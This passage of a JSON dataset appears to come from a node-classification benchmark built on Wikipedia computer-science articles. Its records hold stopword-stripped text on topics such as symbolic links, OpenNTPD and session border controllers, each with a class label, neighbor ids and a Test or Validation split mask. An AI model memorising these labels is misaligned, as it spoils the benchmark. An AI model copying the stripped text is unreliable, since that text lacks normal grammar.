    "text": "Symbolic_link:symbolic link computing symbolic link also symlink soft link term file contains reference another file directory form absolute relative path affects pathname resolution symbolic links already present 1978 minicomputer operating systems dec data general rdos today supported posix operating system standard unix-like operating systems freebsd linux macos limited support also exists windows operating systems windows vista windows 7 degree windows 2000 windows xp form shortcut files symbolic link contains text string automatically interpreted followed operating system path another file directory file directory called target symbolic link second file exists independently target symbolic link deleted target remains unaffected symbolic link points target sometime later target moved renamed deleted symbolic link automatically updated deleted continues exist still points old target non-existing location file symbolic links pointing moved non-existing targets sometimes called broken orphaned dead dangling symbolic links different hard links hard links link paths different volumes file systems whereas symbolic links may point file directory irrespective volumes link target reside hard links always refer existing file whereas symbolic links may contain arbitrary path point anything symbolic links operate transparently many operations programs read write files named symbolic link behave operating directly target file however effect changing otherwise hierarchical filesystem tree directed graph consequences simple operations determining current directory process even unix standard navigating directory parent directory longer works reliably face symlinks shells heuristically try uphold illusion tree-shaped hierarchy causes produce different results programs manipulate pathnames without heuristic relying operating system instead programs need handle symbolic links specially e.g. shells backup utilities thus need identify manipulate directly unix well linux distributions use symbolic links extensively effort reorder file system hierarchy accomplished several mechanisms variant context-dependent symbolic links offers opportunity create intuitive application-specific directory tree reorganize system without redesign core set system functions utilities posix-compliant operating systems symbolic links created codice_1 system call codice_2 shell command normally uses codice_3 system call creates hard link codice_4 flag specified symlink system call used instead creating symbolic link symlinks introduced 4.2bsd unix u.c berkeley following command creates symbolic link command-line interface shell target_path relative absolute path symbolic link point usually target exist although symbolic links may created non-existent targets link_path path symbolic link creating symbolic link may generally treated alias target file system management commands e.g. codice_5 codice_6 may used symbolic link commands read write file contents access contents target file codice_6 delete file command however removes link target file likewise codice_8 command moves renames link target posix directory listing application codice_9 denotes symbolic links arrow name pointing name target file see following example long directory list requested codice_10 option directory listing symbolic link points directory requested link displayed order obtain listing linked directory path must include trailing directory separator character '/ slash note example create three directory creation link /tmp directory early implementations symbolic links stored symbolic link information data regular files file contained textual reference link ’ target indicator denoting symbolic link method slow inefficient use disk-space small systems improvement called fast symlinks allowed storage target path within data structures used storing file information disk inodes space normally stores list disk block addresses allocated file thus symlinks short target paths accessed quickly systems fast symlinks often fall back using original method target path exceeds available inode space original style retroactively termed slow symlink also used disk compatibility older versions operating systems although storing link value inside inode saves disk block disk read operating system still needs parse path name link always requires reading additional inodes generally requires reading potentially many directories processing list files inodes finds match link path components link points file directory fast symlinks provide significantly better performance symlinks vast majority posix-compliant implementations use fast symlinks however posix standard require entire set file status information common regular files implemented symlinks allows implementations use solutions storing symlink data directory entries file system permissions symbolic link used access modes target file controlled target file permissions operating systems freebsd offer ability modify file permissions filesystem attributes symbolic link codice_11 codice_12 system calls respectively reported size symlink number characters path points mac os applications users also employ aliases added feature following target even moved another location volume confused shell command alias ntfs 3.1 introduced support symbolic links type file included windows xp enabled default kernel mode programs windows vista later versions windows enabled support symbolic links user mode applications well supplied command line utility codice_13 creating third-party drivers required enable support ntfs symbolic links windows xp unlike junction points symbolic link also point file remote server message block smb network path additionally ntfs symbolic link implementation provides full support cross-filesystem links however functionality enabling cross-host symbolic links requires remote system also support symbolic links designed aid migration application compatibility posix operating systems microsoft aimed windows vista symbolic links function like unix links however implementation varies unix symbolic links several ways example windows vista users must manually indicate creating symbolic link whether file directory windows 7 vista support maximum 31 reparse points therefore symbolic links given path i.e given path 31 indirections windows gives users new create symbolic link privilege administrators default create symbolic links desired behavior must changed local security policy management console additionally ntfs symbolic links files distinct ntfs symbolic links directories therefore used interchangeably unlike posix symbolic link refer either files directories windows vista later working directory path ends symbolic link current parent path reference refer parent directory symbolic link rather target behaviour also found shell level least posix systems including linux never accessing files directories operating system calls instance bash builtin commands operate current logical directory often used scripts determine actual current working directory path used system call use use actual filesystem parent directory containing pseudo-directory entry may return completely different results example example 2 windows 2000 version ntfs introduced reparse points enabled among things use volume mount points junction points junction points directories moreover local directories junction points remote shares unsupported windows 2000 xp resource kits include program called linkd create junction points powerful one named junction distributed sysinternals mark russinovich standard applications support reparse points noticeably backup suffers problem issue error message 0x80070003 folders backed contain reparse point shortcuts supported graphical file browsers operating systems may resemble symbolic links differ number important ways one difference type software able follow another difference capabilities mechanism almost like shortcuts transparent windows shell implemented ordinary folders need read and/or system attribute containing shortcut named target.lnk refers target hidden desktop.ini least following contents folder shortcuts created used windows shell network neighborhood example shell objects shell folders defined windows registry used implement sort symbolic link like folder shortcuts transparent windows shell minimal implementation clsid 00000000-0000-0000-0000-000000000000 used placeholder documents folder desktop well fonts administrative tools folders control panel examples shell objects redirected file-system folders cygwin simulates posix-compliant symbolic links microsoft windows file system uses identical programming user utility interfaces unix see creates windows shortcuts .lnk files additional information used cygwin time symlink resolution cygwin symlinks compliant windows posix standard additionally cygwin set support native windows symbolic links used cygwin without restrictions requires differences exist however cygwin way specify shortcut-related information – working directory icon – place parameters codice_14 command create standard microsoft .lnk files cygwin provides codice_15 codice_16 utilities cygwin user guide information topic command creating symbolic links codice_17 also used hard links internally dos.library returns error code indicating target soft link try perform actions legal file applications wish follow symbolic link needs explicitly make call follow link retry operation amigados shell follow links automatically os/2 operating system symbolic links somewhat resemble shadows graphical workplace shell however shadows due fully object-oriented system object model considerably powerful robust simple link example shadows lose capabilities renamed either object subject link relocated symbolic links may implemented context-dependent variable fashion link points varying targets depending configuration parameter run-time parameter instantaneous condition variable variant symbolic link symbolic link variable name embedded allows flexibility filesystem order possible standard symbolic link variables embedded symbolic link may include user environment specific information operating systems make use variant symbolic links include netbsd dragonfly bsd domain/os tru64 uses context dependent symbolic link context cluster member number pyramid technology osx operating system implemented conditional symbolic links pointed different locations depending universe program running universes supported sysv.3 berkeley software distribution bsd 4.3 example ps command run att universe symbolic link directory /bin would point /.attbin program /.attbin/ps would executed whereas ps command run ucb universe /bin would point /.ucbbin /.ucbbin/ps would executed similar conditional symbolic links also created directories /lib /usr/lib /usr/include",
    "neighbors": [
      5120,
      516,
      6669,
      3598,
      10257,
      6677,
      5142,
      8214,
      9762,
      5158,
      2095,
      52,
      11323,
      576,
      8772,
      6727,
      2120,
      7244,
      3170,
      4708,
      8298,
      9836,
      7789,
      9840,
      9333,
      6263,
      9335,
      9343,
      1668,
      7818,
      6797,
      654,
      2193,
      2194,
      2197,
      2198,
      2199,
      10394,
      11419,
      6813,
      6309,
      1190,
      5286,
      10405,
      1193,
      5293,
      7344,
      8369,
      11442,
      2230,
      5816,
      1212,
      8380,
      5313,
      8902,
      10951,
      9420,
      3794,
      3795,
      4819,
      8404,
      6358,
      728,
      8410,
      6365,
      7907,
      3300,
      6377,
      8938,
      1263,
      3312,
      3826,
      2291,
      9972,
      246,
      3834,
      3328,
      3330,
      11012,
      2314,
      8461,
      6416,
      5397,
      6935,
      11033,
      8988,
      287,
      1825,
      6434,
      9505,
      5413,
      3368,
      9004,
      302,
      1839,
      7983,
      6961,
      1332,
      1844,
      823,
      4919,
      9533,
      3909,
      2378,
      4431,
      5975,
      346,
      2395,
      2397,
      10596,
      11632,
      5492,
      7540,
      6519,
      2424,
      376,
      890,
      11128,
      2432,
      7554,
      3975,
      5514,
      8075,
      4506,
      11675,
      414,
      2974,
      7070,
      4012,
      1454,
      2479,
      6062,
      8110,
      8114,
      2995,
      7603,
      8631,
      1464,
      1978,
      9151,
      960,
      3522,
      8643,
      7126,
      8671,
      6624,
      1509,
      9189,
      6120,
      6637,
      6126,
      7663,
      3571,
      11256,
      3582
    ],
    "mask": "None"
  },
  {
    "node_id": 5970,
    "label": 2,
    "text": "OpenNTPD:openntpd openntpd also known openbsd ntp daemon unix daemon implementing network time protocol synchronize local clock computer system remote ntp servers also able act ntp server ntp-compatible clients openntpd primarily developed henning brauer part openbsd project design goals include secure non-exploitable easy configure accurate enough purposes portable version like openssh developed child project adds portability code openbsd version releases separately portable version developed brent cook project developers receive funding openbsd foundation development openntpd motivated combination issues current ntp daemons difficult configuration complicated difficult audit code unsuitable licensing openntpd designed solve problems make time synchronization accessible wider userbase period development openntpd first appeared openbsd 3.6 first release announced 2 november 2004 openntpd attempt openbsd team produce ntp daemon implementation secure simple audit trivial set administer reasonably accurate light system resources design goals openntpd security ease use performance security openntpd achieved robust validity check network input path use bounded buffer operations via strlcpy privilege separation mitigate effects possible security bugs exploiting daemon privilege escalation order simplify use ntp openntpd implements smaller set functionalities available ntp daemons provided network time protocol project objective provide enough features satisfy typical usage risk unsuitability esoteric niche requirements openntpd configured configuration file ntpd.conf minimal number options offered ip address hostname openntpd listen timedelta sensor device used set servers time synchronized accuracy openntpd best-effort daemon attempts accurate possible specific accuracy guaranteed openntpd gradually adjusts system clock seen output openntpd running linux system openntpd criticized less accurate ntp daemon produced internet software consortium isc internally openntpd maintain millisecond accuracy vary 50-200ms real time omits variety algorithms increase accuracy favour code simplicity openntpd project acknowledged criticism stated lack microsecond precision design tradeoff benefited simplicity security openntpd design goals state project intent r reasonable accuracy without sacrificing secure design getting last nanosecond obscure edge case september 2004 shortly release openntpd 3.6 isc ntp contributor brad knowles published article entitled openntpd considered harmful criticizing various aspects openntpd implementation ntp protocol well split development model project employs also used development openssh openbgpd december 2004 darren tucker principal developer portable branch openntpd wrote detailed response knowles acknowledging issues valid rejecting several others unwarranted considering yet others misleading among serious issues raised knowles openntpd servers claimed stratum 1 servers issue however already fixed time tucker response march 2005 knowles acknowledged tucker response stated going everything could work tucker get remaining issues resolved additionally openbsd networking faq expanded response knowles initial criticism openntpd openbsd kernel ignore leap seconds care taken using openntpd higher-stratum source ntpd servers high-resolution time requirements reference coordinated universal time leap seconds used coordinated universal time international atomic time global positioning system time signals united states naval observatory bureau international des poids et mesures recommends systems implementing leap seconds referenced international atomic time directly gps time signals",
    "neighbors": [
      9223,
      10631,
      2825,
      3465,
      1932,
      3473,
      274,
      8725,
      7702,
      8344,
      10105,
      6702,
      7983,
      9520,
      823,
      8637,
      2245,
      1993,
      8778,
      3404,
      11086,
      5084,
      7139,
      1637,
      4071,
      10344,
      5230,
      5492,
      1785,
      8954,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5971,
    "label": 4,
    "text": "CARO:caro caro computer antivirus research organization organization established 1990 research study malware organization perhaps best known virus naming convention 1991 subsequent revisions though widely adopted still faced usage obstacles led proposal new naming systems product vendors industry groups annual workshop biggest caro event workshop usually organized hosted one anti-virus firm home country workshops started 2007 attendance limited 120-130 top anti-malware experts strict policy photography recordings kind br caro collaboration eicar european institute computer antivirus research developed eicar test file executable string designed test integrity antivirus software caro membership private issue members choosing publicize membership members caro founders current publicly stated membership point include friðrik skúlason founder frisk software international dr. alan solomon founder dr solomon antivirus toolkit vesselin bontchev mikko hyppönen cro f-secure eugene kaspersky founder kaspersky lab nick fitzgerald peter ferrie dmitry gryaznov igor muttik atley padgett peterson costin raiu peter kruse morton swimmer righard zwienenberg philipp wolf",
    "neighbors": [
      7809,
      9537,
      37,
      2213,
      2601,
      43,
      5586,
      4441,
      7515,
      9246
    ],
    "mask": "Test"
  },
  {
    "node_id": 5972,
    "label": 4,
    "text": "Session_border_controller:session border controller session border controller sbc network element deployed protect sip based voice internet protocol voip networks early deployments sbcs focused borders two service provider networks peering environment role expanded include significant deployments service provider access network backbone network provide service residential and/or enterprise customers term session refers communication two parties – context telephony would call call consists one call signaling message exchanges control call one call media streams carry call audio video data along information call statistics quality together streams make session job session border controller exert influence data flows sessions term border refers point demarcation one part network another simple example edge corporate network firewall demarcates local network inside corporation rest internet outside corporation complex example large corporation different departments security needs location perhaps kind data case filtering routers network elements used control flow data streams job session border controller assist policy administrators managing flow session data across borders term controller refers influence session border controllers data streams comprise sessions traverse borders one part network another additionally session border controllers often provide measurement access control data conversion facilities calls control sbcs commonly maintain full session state offer following functions advent webrtc sbcs also assumed role sip webrtc gateway translate sip one signalling protocol mandated webrtc specifications sip websockets rfc 7118 often used partially due applicability sip envisaged communication scenarios well availability open source software jssip case sbc acts gateway webrtc applications sip end points sbcs inserted signaling and/or media paths calling called parties voip call predominantly using session initiation protocol sip h.323 mgcp call-signaling protocols many cases sbc hides network topology protects service provider enterprise packet networks sbc terminates inbound call initiates second call leg destination party technical terms used sip protocol defines back-to-back user agent b2bua effect behavior signaling traffic also media traffic voice video controlled sbc cases sbc capability provide media services sbcs also able redirect media traffic different element elsewhere network recording generation music-on-hold media-related purposes conversely without sbc media traffic travels directly endpoints without in-network call signaling elements control path cases sbc simply modifies stream call control signaling data involved call perhaps limiting kinds calls conducted changing codec choices ultimately sbcs allow network operators manage calls made networks fix change protocols protocol syntax achieve interoperability also overcome problems firewalls network address translators nats present voip calls show operation sbc one compare simple call establishment sequence call establishment sequence sbc simplest session establishment sequence one proxy user agents proxy ’ task identify callee ’ location forward request proxy also adds via header address indicate path response traverse proxy change dialog identification information present message tag header call-id cseq proxies also alter information sip message bodies note session initiation phase user agents exchange sip messages sdp bodies include addresses agents expect media traffic successfully finishing session initiation phase user agents exchange media traffic directly without involvement proxy sbcs designed many applications used operators enterprises achieve variety goals even sbc implementation might act differently depending configuration use case hence easily possible describe exact sbc behavior would apply sbc implementations general possible identify certain features common sbcs example sbcs implemented back-to-back user agent b2bua proxy-like server splits sip transaction two call legs side facing user agent client uac acts server side facing user agent server uas acts client proxy usually keeps state information related active transactions b2buas keep state information active dialogs e.g. calls proxy receives sip request save state information transaction e.g. receiving response state information soon deleted b2bua maintain state information active calls delete information call terminated sbc included call path sbc acts b2bua behaves user agent server towards caller user agent client towards callee sense sbc actually terminates call generated caller starts new call towards callee invite message sent sbc contains longer clear reference caller invite sent sbc proxy includes via contact headers point sbc caller sbcs often also manipulate dialog identification information listed call-id tag case sbc configured also control media traffic sbc also changes media addressing information included c lines sdp body thereby sip messages traverse sbc also audio video packets invite sent sbc establishes new dialog sbc also manipulates message sequence number cseq well max-forwards value note list header manipulations listed subset possible changes sbc might introduce sip message furthermore sbcs might listed manipulations sbc expected control media traffic might need change anything sdp header sbcs change dialog identification information others might even change addressing information sbcs often used corporations along firewalls intrusion prevention systems ips enable voip calls protected enterprise network voip service providers use sbcs allow use voip protocols private networks internet connections using nat also implement strong security measures necessary maintain high quality service sbcs also replace function application-level gateways larger enterprises sbcs also used conjunction sip trunks provide call control make routing/policy decisions calls routed lan/wan often tremendous cost savings associated routing traffic internal ip networks enterprise rather routing calls traditional circuit-switched phone network additionally sbcs allow voip calls set two phones using different voip signaling protocols e.g. sip h.323 megaco/mgcp well performing transcoding media stream different codecs use sbcs also provide firewall features voip traffic denial service protection call filtering bandwidth management protocol normalization header manipulation also commonly provided sbcs enabling communication different vendors networks ip multimedia subsystem ims 3gpp 3rd generation partnership project architecture perspective sbc integration p-cscf ims-alg signaling plane ims access gateway media plane access side interconnect side sbc maps ibcf iwf signaling plane trgw transition gateway media plane ims/tispan architecture perspective sbc integration p-cscf c-bgf functions access side ibcf iwf thig i-bgf functions peering side sbcs decomposed meaning signaling functions located separate hardware platform media relay functions – words p-cscf separated c-bgf ibcf/iwf separated i-bgf functions physically standards-based protocol h.248 ia profile used signaling platform control media one sbcs use proprietary protocols infancy concept sbc controversial proponents end-to-end systems peer-to-peer networking controversy surrounding sbcs pertains whether call control remain solely two endpoints call service owners rather shared network elements owned organizations managing various networks involved connecting two call endpoints example call control remain alice bob two callers call control shared operators ip networks involved connecting alice bob voip phones together debate point vigorous almost religious nature wanted unfettered control endpoints also greatly frustrated various realities modern networks firewalls filtering/throttling side network operators typically concerned overall network performance interoperability quality want ensure secure sbc may provide session media usually rtp signaling often sip wiretap services used providers enforce requests lawful interception network sessions standards interception services provided atis tia cablelabs etsi among others according jonathan rosenberg author rfc 3261 sip numerous related rfcs dynamicsoft developed first working sbc conjunction aravox product never truly gained marketshare newport networks first ipo london stock exchange aim may 2004 nng cisco publicly traded since 1990 acme packet followed october 2006 floating nasdaq field narrowed acquisition nextone merged reefpoint becoming nextpoint subsequently acquired 2008 genband time emerged “ integrated ” sbc border control function integrated another edge device 2009 ingate systems ’ firewall became first sbc earn certification icsa labs milestone certifying voip security capabilities sbc continuing growth voip networks pushes sbcs edge mandating adaptation capacity complexity voip network grows traffic volume increases sessions passing sbc vendors addressing new scale requirements variety ways developed separate load balancing systems sit front sbc clusters others developed new architectures using latest generation chipsets offering higher performance sbcs scalability using service cards",
    "neighbors": [
      8640,
      9381,
      8998,
      6951,
      2376,
      2409,
      3081,
      939,
      9834,
      7214,
      7407,
      3792,
      6512,
      5843,
      4084,
      1942,
      3742,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 5973,
    "label": 1,
    "text": "Nature_Research:nature research nature research formerly known nature publishing group division international scientific publishing company springer nature publishes academic journals magazines online databases services science medicine nature research flagship publication nature weekly multidisciplinary journal first published 1869 also publishes nature- titled research journals nature reviews journals since 2000 society-owned academic journals range open access journals including scientific reports nature communications springer nature also publishes scientific american 16 languages magazine intended general public 2013 prior merger springer creation springer nature nature publishing group owner holtzbrinck publishing group bought controlling stake frontiers springer nature formed 2015 nature research nature publishing group part macmillan science education fully owned subsidiary holtzbrinck publishing group nature research employs 800 people offices london new york city san francisco seoul washington d.c. boston tokyo paris berlin munich madrid hong kong shanghai delhi melbourne mexico city buenos aires são paulo basingstoke september 2016 nature research publishes 148 academic journals former nature clinical practice series rebranded folded nature reviews series april 2009 also publish npj nature partner journals series cases costs springer nature publications recovered via subscription individuals institutions 40 journals allow authors publish open access articles author institution research funder paying publication charge journal publisher also several open access journals authors also allowed post accepted unedited papers websites funding body archives earlier 6 months publication june 2010 letter outlining university california libraries pricing challenges npg distributed university faculty campus librarians support systemwide university committee library scholarly communication letter also described potential boycott dispute resolved august 2010 joint statement released stating two organizations agreed work together coming months address mutual short- long-term challenges including exploration potential new approaches evolving publishing models 2 december 2014 npg announced would make content nature journals available online free however articles presented using digital rights management system readcube funded macmillan subsidiary digital science provides read-only access allow readers download copy print otherwise distribute content additionally links articles generated nature subscribers group selected media outlets—but links publicly distributed online articles social networks afterwards providers also provide annotations linked articles move designed counter trend dark sharing leveraging readcube provide analytics considering compromise fully restricted access critics consider true open access scheme due restrictions use distribution 2011 nature launched first line electronic textbooks college market starting principles biology adopted california state university textbook line described vikram savkar senior vice president publishing director nature publishing group potentially breaking traditional textbook publishing model active nature research services include past experiments offering online services include",
    "neighbors": [
      5833,
      743
    ],
    "mask": "None"
  },
  {
    "node_id": 5974,
    "label": 3,
    "text": "PlayStation_Broadband_Navigator:playstation broadband navigator playstation broadband navigator also referred bb navigator psbbn software japanese playstation 2 consoles formats hard disk drive use consoles provides interface manipulating data hard disk drive works official playstation 2 hdd units apparently playstation broadband navigator strict region lock normal playstation 2 software software boot ntsc-j systems model number ending 0 meaning sold japan making software unusable korean asian ntsc-j playstation 2 consoles playstation broadband navigator offers many features available original hdd utility disc software japanese releases take advantage features may even require specific version higher software sony computer entertainment america released hdd march 23 2004 hdd utility disc 1.01 bundled final fantasy xi consumers knew playstation broadband navigator confused n't included hdd utility disc scea response always playstation broadband navigator would released north america later date date appears never light scea switched manufacturing slim hdd-incompatible playstation 2 models stopping manufacture hdd units region sony computer entertainment europe sony computer entertainment australia never released hdd outside linux kit switching manufacturing slim playstation 2 model appears neither hdd utility disc playstation broadband navigator released regions broadband navigator used ps2 using modified var games require playstation broadband navigator either certain features work game work",
    "neighbors": [
      10316,
      5215,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 5975,
    "label": 3,
    "text": "Read_(system_call):read system call modern posix compliant operating systems program needs access data file stored file system uses read system call file identified file descriptor normally obtained previous call open system call reads data bytes number specified caller file stores buffer supplied calling process read system call takes three arguments read system call interface standardized posix specification data file read calling read function value returned number bytes read zero indicates end file file position advanced number error number smaller number bytes requested may happen example fewer bytes actually available right maybe close end-of-file reading pipe terminal system call interrupted signal alternatively -1 returned error occurs case errno set appropriately left unspecified whether file position changes",
    "neighbors": [
      4616,
      3082,
      7188,
      10785,
      9762,
      6180,
      5158,
      8242,
      52,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      6244,
      5222,
      10856,
      4207,
      9840,
      5244,
      4734,
      11391,
      7821,
      4238,
      10382,
      2711,
      6808,
      9882,
      6813,
      1694,
      2723,
      1193,
      8364,
      10933,
      5822,
      5824,
      1736,
      2762,
      6352,
      6358,
      4831,
      8928,
      2278,
      233,
      7403,
      10482,
      246,
      8438,
      8439,
      2809,
      3330,
      1291,
      4367,
      792,
      8988,
      10016,
      295,
      1844,
      823,
      6968,
      7992,
      9533,
      318,
      3911,
      6988,
      10063,
      5969,
      11095,
      10091,
      7540,
      8573,
      2432,
      8066,
      900,
      5514,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      1972,
      3522,
      9667,
      457,
      2529,
      6625,
      8676,
      1509,
      2021,
      1513,
      6126,
      3055,
      7663,
      5105,
      3571,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "Test"
  },
  {
    "node_id": 5976,
    "label": 3,
    "text": "Mac_OS_nanokernel:mac os nanokernel mac os nanokernel extremely simple operating system kernel serving basis powerpc based system software versions 7 9 classic mac os predating mac os x initial revision software extremely simple single tasking system delegates tasks emulator running motorola 68000 series 68k version operating system second major revision supports multitasking multiprocessing message passing would properly called microkernel unlike 68k-derived mac os kernel running within powerpc kernel exists protected memory space executes device drivers user mode nanokernel different copland os microkernel although created succession similar goals original nanokernel tightly integrated mac 68k emulator written emulation consultant gary davidian main purpose allow existing motorola 68k version operating system run new hardware normal state system running 68k code operating system little activated interrupt quickly mapped 68k equivalent within virtual machine tasks may include switching back powerpc mode necessary upon completion interrupt handler mapping macintosh virtual memory system powerpc hardware however software little documented might instead handled emulator running user mode nanokernel stored mac os rom chip integrated old world rom computers inside mac os rom file disk new world rom computers rather installed familiar sense progress 1994 demanded additional functionality forward-looking architecture introduced pci card drivers anticipation copland microkernel called nukernel supports memory protection open transport networking architecture introduced standardized powerpc synchronization primitives daystar digital genesis mp macintosh clone requires kernel extensions support multiprocessing evolution would later affect overhaul nanokernel mac os 8.6 mac os 8.6 nanokernel rewritten rené a. vega add multiprocessing services 2.0 support powermacinfo distributed multiprocessing sdk application displays statistics nanokernel operation",
    "neighbors": [
      7561,
      1042,
      7187,
      10516,
      11539,
      6300,
      5029,
      7335,
      2345,
      11180,
      7983,
      11447,
      5049,
      10813,
      576,
      2761,
      9931,
      5457,
      3324,
      9176,
      3167,
      8551,
      5864,
      5363,
      11123,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 5977,
    "label": 9,
    "text": "Patrick_Cousot:patrick cousot patrick cousot born 3 december 1948 french computer scientist currently silver professor computer science courant institute mathematical sciences new york university usa professor école normale supérieure ens paris france école polytechnique palaiseau france university metz france research scientist french national center scientific research cnrs joseph fourier university grenoble france together wife radhia cousot 1947–2014 patrick cousot originator abstract interpretation influential technique formal methods 2000s worked practical methods static analysis critical embedded software astrée found avionics 1999 received cnrs silver medal 2006 great prize eads foundation 2001 bestowed honorary doctorate saarland university germany radhia cousot received acm sigplan programming languages achievement award 2013 ieee computer society harlan d. mills award 2014 “ invention ‘ abstract interpretation ’ development tool support practical application ” received humboldt research award 2008 2018 ieee john von neumann medal introducing abstract interpretation powerful framework automatically calculating program properties broad application verification optimisation knight chevalier ordre national du mérite ordre des palmes académiques member academia europaea informatics section since 2006 member board trustees imdea software institute",
    "neighbors": [
      7520,
      11005,
      1783
    ],
    "mask": "Test"
  },
  {
    "node_id": 5978,
    "label": 7,
    "text": "B.A.T.M.A.N.:b.a.t.m.a.n better approach mobile adhoc networking b.a.t.m.a.n routing protocol multi-hop mobile ad hoc networks development german freifunk community intended replace optimized link state routing protocol olsr b.a.t.m.a.n crucial point decentralization knowledge best route network — single node data technique eliminates need spread information concerning network changes every node network individual node saves information direction received data sends data accordingly data gets passed node node packets get individual dynamically created routes network collective intelligence created early 2007 b.a.t.m.a.n developers started experimenting idea routing layer 2 ethernet layer instead layer 3 differentiate layer 3 routing daemon suffix adv advanced chosen instead manipulating routing tables based information exchanged via udp/ip provides virtual network interface transparently transports ethernet packets batman-adv kernel module part official linux kernel since 2.6.38 b.a.t.m.a.n elements classical routing protocols detects b.a.t.m.a.n nodes finds best way route also keeps track new nodes informs neighbors existence static networks network administrators technicians decide computer reached via way cable radio networks undergo constant changes low participation-thresholds vital part freifunk -networks foundation task automated much possible regular basis every node sends broadcast thereby informing neighbors existence neighbors relay message neighbors carries information every node network order find best way certain node b.a.t.m.a.n counts originator-messages received logs neighbor message came like distance-vector protocols b.a.t.m.a.n try determine entire route using originator-messages packet first step right direction data handed next neighbor direction turn uses mechanism process repeated data reaches destination addition radio networks b.a.t.m.a.n also used common wired cable connections ethernet task create protocol easy small fast possible seemed therefore sensible split development several phases implement complex functions using iterative process first phase routing algorithm implemented tested practicality suitability task hand sending receiving originator-messages information existence udp port 1966 chosen version one algorithm made significant assumption soon node receives existence data another node assumes also send data back radio networks however may well one-way communication possible i.e. asymmetric links mechanism incorporated protocol allow solve arising problems mechanism enables node determine whether neighbouring node provides bidirectional communication bidirectional nodes considered part network one-way nodes longer fully included greatest innovation version b.a.t.m.a.n support multiple network devices computer router running b.a.t.m.a.n deployed central location like church another high building several wired wireless network interfaces attached deployed b.a.t.m.a.n relay network data one direction without retransmission delay certain unusual phenomena special circumstances could appear determination best route network tackled counteracted prevent circular routing prevent data reaching destination occurring node inform network provides access internet nodes use information evaluate whether connection internet close much bandwidth available either use specific gateway allow b.a.t.m.a.n determine gateway use based criteria connection speed announcing devices running b.a.t.m.a.n also included version usually method used connect home networks mesh-networks antenna installation roof connect wireless network b.a.t.m.a.n rest building simply announced thus also reachable version b.a.t.m.a.n shown exhibit high levels stability slightly slow convergence times real-world conditions confirmed theoretical analysis batman-experimental bmx aims approximate real exponent also sending ogms multiple times independent broadcast datagrams originated independent branch batman developed axel neumann extended version incorporates securely-entrusted multi-topology routing semtor called bmx7 2017 b.a.t.m.a.n written whiteboard hbo series silicon valley season 4 episode 2 show lead character richard hendricks appears include b.a.t.m.a.n component new internet concept text visible top-right whiteboard",
    "neighbors": [
      4611,
      7812,
      11399,
      2825,
      9098,
      2829,
      5397,
      1814,
      11413,
      152,
      2206,
      8862,
      2085,
      3751,
      3752,
      686,
      7983,
      9279,
      7232,
      10433,
      5959,
      5322,
      11086,
      10451,
      9048,
      3036,
      5472,
      1761,
      610,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 5979,
    "label": 4,
    "text": "Lace_card:lace card lace card punched card holes punched also called whoopee card ventilator card flyswatter card ibm doily mainly used practical jokes cause unwanted disruption card readers card readers tended jam lace card inserted resulting card little structural strength avoid buckling inside mechanism card punches could also jam trying produce cards holes punched owing power-supply problems lace card fed reader card knife card saw flat tool used punched card readers card punches needed clear jam",
    "neighbors": [
      3872,
      1801,
      3323,
      2423
    ],
    "mask": "Test"
  },
  {
    "node_id": 5980,
    "label": 3,
    "text": "Appendix_H:appendix h appendix h name infamous appendix pentium processor family developer manual volume 3 appendix contained reference documentation available legally binding nda ndaed documentation described various new features introduced pentium processor notably virtual mode extensions vme 4 mb paging vme confused later intel vt virtualization technology vme added additional feature existing virtual 8086 mode introduced 80386 processor included optimized handling delivery interrupts virtual machines appendix referenced official chapters documentation provoking irritation among public allowed access detailed descriptions started movement observers trying reverse-engineer information various ways notably robert collins writing dr. dobb journal christian ludloff owner sandpile.org website played major role",
    "neighbors": [
      5840,
      6730
    ],
    "mask": "None"
  },
  {
    "node_id": 5981,
    "label": 4,
    "text": "Wazuh:wazuh wazuh free open-source host-based intrusion detection system hids performs log analysis integrity checking windows registry monitoring rootkit detection time-based alerting active response provides intrusion detection operating systems including linux openbsd freebsd os x solaris windows wazuh centralized cross-platform architecture allowing multiple systems monitored managed wazuh fork ossec",
    "neighbors": [
      5612,
      6797,
      7983,
      823,
      186,
      2558,
      9791
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5982,
    "label": 2,
    "text": "HDOS:hdos hdos early microcomputer operating system originally written heathkit h8 computer system later also available heathkit h89 zenith z-89 computers author heath company employee gordon letwin later early employee microsoft lead architect os/2 hdos originally came limited set system software tools including assembler many commercial large set freeware programs hug heath user group became available eventually hdos 2.0 notable one first microcomputer operating systems use loadable device drivers achieve degree device independence extensibility device names followed rsx-11-style convention dkn first two letters device driver file name n number dk0 dk1 would handled dk.sys similarities rsx included use pip file transfer use eot file termination similar heath/zenith published complete schematics part lists computers company sold users source code hdos full source paper listing held yesterpc.org old computer museum item references heathkit part number hos-1-sl part number 595-2466",
    "neighbors": [
      2179,
      9166,
      7983,
      3056,
      6675,
      477,
      10590
    ],
    "mask": "Test"
  },
  {
    "node_id": 5983,
    "label": 1,
    "text": "Data_retrieval:data retrieval data retrieval means obtaining data database management system odbms case considered data represented structured way ambiguity data order retrieve desired data user present set criteria query database management system dbms software managing databases selects demanded data database retrieved data may stored file printed viewed screen query language structured query language sql used prepare queries sql american national standards institute ansi standardized query language developed specifically write database queries dbms may language relational reports queries two primary forms retrieved data database overlaps queries generally select relatively small portion database reports show larger amounts data queries also present data standard format usually display monitor whereas reports allow formatting output however like normally printed reports designed using report generator built dbms",
    "neighbors": [
      3556,
      9286,
      4797,
      10471,
      7229
    ],
    "mask": "Test"
  },
  {
    "node_id": 5984,
    "label": 1,
    "text": "Architectuul:architectuul architectuul online architecture catalog uses crowdsourcing build content founded 2010 team architects graphic designers software engineers content images uploaded site use creative commons license making process similar wikipedia architectuul buildings various era large range 20th century rare constructivist architecture architectuul utilised source several publications universities including wall street journal",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5985,
    "label": 2,
